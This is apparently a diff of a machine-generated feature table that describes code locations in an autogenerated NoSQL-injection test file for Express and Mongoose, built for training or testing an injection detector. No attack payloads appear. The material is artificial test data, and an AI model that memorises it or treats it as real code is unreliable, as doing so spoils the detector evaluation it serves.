autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:40:97:44 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:40:97:44 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:46:97:50 | query | CalleeFlexibleAccessPath | err.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:46:97:50 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:46:97:50 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2806,6 +14101,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:46:97:50 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:46:97:50 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:46:97:50 | query | receiverName | err | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:15 | Document.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:15 | Document.count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:15 | Document.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:15 | Document.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:50 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:50 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:50 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:50 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:50 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:50 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:50 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:2:99:50 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:11:99:15 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:11:99:15 | count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:11:99:15 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:11:99:15 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:17:99:17 | X | CalleeFlexibleAccessPath | Document.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:17:99:17 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:17:99:17 | X | calleeImports | mongoose | @@ -2814,6 +14129,14 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:17:99:17 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:17:99:17 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:17:99:17 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:19 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:19 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:19 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:19 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | (err, r ... (query) | CalleeFlexibleAccessPath | Document.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | (err, r ... (query) | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | (err, r ... (query) | calleeImports | mongoose | @@ -2822,6 +14145,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | (err, r ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | (err, r ... (query) | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | (err, r ... (query) | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:20:99:49 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:21:99:23 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:21:99:23 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:21:99:23 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:21:99:23 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:26:99:28 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:26:99:28 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:26:99:28 | res | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:26:99:28 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:26:99:28 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:26:99:28 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:26:99:28 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:26:99:28 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:36 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:36 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:36 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:36 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:42 | res.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:42 | res.count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:42 | res.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:42 | res.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:49 | exceptional return of res.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:49 | exceptional return of res.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:49 | exceptional return of res.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:49 | exceptional return of res.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:49 | res.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:49 | res.count(query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:49 | res.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:34:99:49 | res.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:38:99:42 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:38:99:42 | count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:38:99:42 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:38:99:42 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:44:99:48 | query | CalleeFlexibleAccessPath | res.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:44:99:48 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:44:99:48 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2829,6 +14192,70 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:44:99:48 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:44:99:48 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:99:44:99:48 | query | receiverName | res | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:101:1 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:101:1 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:101:1 | Mongoose | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:101:1 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:101:1 | this | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:101:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:101:1 | this | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:101:1 | this | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | 'arguments' object of function innocent | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | 'arguments' object of function innocent | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | 'arguments' object of function innocent | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | 'arguments' object of function innocent | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | exceptional return of function innocent | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | exceptional return of function innocent | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | exceptional return of function innocent | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | exceptional return of function innocent | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | functio ... t");\\n\\t} | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | functio ... t");\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | functio ... t");\\n\\t} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | functio ... t");\\n\\t} | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | return of function innocent | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | return of function innocent | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | return of function innocent | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:2:103:2 | return of function innocent | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:11:101:18 | innocent | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:11:101:18 | innocent | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:11:101:18 | innocent | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:11:101:18 | innocent | contextSurroundingFunctionParameters | (X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:11:101:18 | innocent | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:11:101:18 | innocent | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:11:101:18 | innocent | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:11:101:18 | innocent | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:20:101:20 | X | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:20:101:20 | X | contextSurroundingFunctionParameters | (X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:20:101:20 | X | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:20:101:20 | X | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:23:101:23 | Y | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:23:101:23 | Y | contextSurroundingFunctionParameters | (X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:23:101:23 | Y | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:23:101:23 | Y | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:26:101:30 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:26:101:30 | query | contextSurroundingFunctionParameters | (X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:26:101:30 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:101:26:101:30 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:10:102:63 | exceptional return of new Mon ... stant") | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:10:102:63 | exceptional return of new Mon ... stant") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:10:102:63 | exceptional return of new Mon ... stant") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:10:102:63 | exceptional return of new Mon ... stant") | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:10:102:63 | new Mon ... stant") | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:10:102:63 | new Mon ... stant") | contextSurroundingFunctionParameters | (X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:10:102:63 | new Mon ... stant") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:10:102:63 | new Mon ... stant") | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:14:102:21 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:14:102:21 | Mongoose | contextSurroundingFunctionParameters | (X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:14:102:21 | Mongoose | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:14:102:21 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:14:102:27 | Mongoose.Query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:14:102:27 | Mongoose.Query | contextSurroundingFunctionParameters | (X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:14:102:27 | Mongoose.Query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:14:102:27 | Mongoose.Query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:23:102:27 | Query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:23:102:27 | Query | contextSurroundingFunctionParameters | (X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:23:102:27 | Query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:23:102:27 | Query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:29:102:38 | "constant" | CalleeFlexibleAccessPath | Mongoose.Query | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:29:102:38 | "constant" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:29:102:38 | "constant" | calleeImports | mongoose | @@ -2850,6 +14277,116 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:53:102:62 | "constant" | contextSurroundingFunctionParameters | (X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:53:102:62 | "constant" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:102:53:102:62 | "constant" | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:2:104:26 | exceptional return of new inn ... query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:2:104:26 | exceptional return of new inn ... query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:2:104:26 | exceptional return of new inn ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:2:104:26 | exceptional return of new inn ... query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:2:104:26 | new inn ... query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:2:104:26 | new inn ... query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:2:104:26 | new inn ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:2:104:26 | new inn ... query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:6:104:13 | innocent | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:6:104:13 | innocent | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:6:104:13 | innocent | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:6:104:13 | innocent | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:15:104:15 | X | CalleeFlexibleAccessPath | innocent | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:15:104:15 | X | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:15:104:15 | X | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:15:104:15 | X | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:15:104:15 | X | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:15:104:15 | X | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:18:104:18 | Y | CalleeFlexibleAccessPath | innocent | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:18:104:18 | Y | InputArgumentIndex | 1 | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:18:104:18 | Y | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:18:104:18 | Y | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:18:104:18 | Y | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:18:104:18 | Y | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:21:104:25 | query | CalleeFlexibleAccessPath | innocent | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:21:104:25 | query | InputArgumentIndex | 2 | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:21:104:25 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:21:104:25 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:21:104:25 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:104:21:104:25 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:106:1 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:106:1 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:106:1 | Mongoose | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:106:1 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:106:1 | this | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:106:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:106:1 | this | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:106:1 | this | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | 'arguments' object of function getQueryConstructor | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | 'arguments' object of function getQueryConstructor | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | 'arguments' object of function getQueryConstructor | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | 'arguments' object of function getQueryConstructor | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | exceptional return of function getQueryConstructor | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | exceptional return of function getQueryConstructor | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | exceptional return of function getQueryConstructor | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | exceptional return of function getQueryConstructor | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | functio ... ery;\\n\\t} | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | functio ... ery;\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | functio ... ery;\\n\\t} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | functio ... ery;\\n\\t} | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | return of function getQueryConstructor | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| 